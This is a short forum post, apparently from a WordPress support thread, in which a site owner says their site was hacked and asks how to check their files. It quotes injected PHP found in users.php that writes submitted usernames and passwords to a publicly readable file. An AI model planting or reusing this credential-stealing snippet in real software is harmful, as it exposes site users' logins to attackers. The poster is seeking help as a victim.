nash9988

Thanks for your help, I compared my current wordpress core files with a downloaded version(from www.remarpro.com), and there is no other difference between the two version.
I will contact my hosting provider.

Thanks again.

I think yes, someone hacked my site.
I found this code in my users.php:

$myFile ="wp-includes/Text/index.html";
$fh = fopen($myFile, 'a');
fwrite($fh,$_POST['log']);
fwrite($fh, "    ");
fwrite($fh, $_POST['pwd']);
fwrite($fh, "</br>");
fclose($fh);

Can I check all of my system files somehow?